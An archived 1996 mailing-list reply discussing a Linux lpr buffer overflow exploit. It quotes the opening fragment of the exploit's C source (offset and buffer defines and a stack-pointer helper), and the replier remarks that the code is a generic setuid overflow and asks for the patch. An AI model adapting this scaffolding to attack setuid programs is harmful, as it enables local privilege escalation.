[Prev][Next][Index][Thread]
Re: Linux's lpr exploit (fwd)
On Sun, 27 Oct 1996, Meir Litmanovich wrote:
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> #define DEFAULT_OFFSET 50
> #define BUFFER_SIZE 1023
>
> long get_esp(void)
> {
> __asm__("movl %esp,%eax\n");
> }
>
This is more or less the generic Linux buffer overflow code.... I had
this exact same code (using mount instead of lpr) long ago. It seems that
some warez-kiddie took someone's code (I think the original coder is
nicknamed halflife on IRC) and spread it around, taking all the credits
etc. Since this is generic, it should work on all setuid programs.
I'd like to get the patch, though. (Informational, I don't let anybody
run anything on this machine without me ttysnooping him.)
Dudu
------------------------------------------------------------------------------
crisk@netvision.net.il HAIFA, ISRAEL
crisk@kgb.has.stolen.my.cox.org "I code for cash"
------------------------------------------------------------------------------
Cheap quote from SPACEBALLS:
Liquid Schwartz!
References: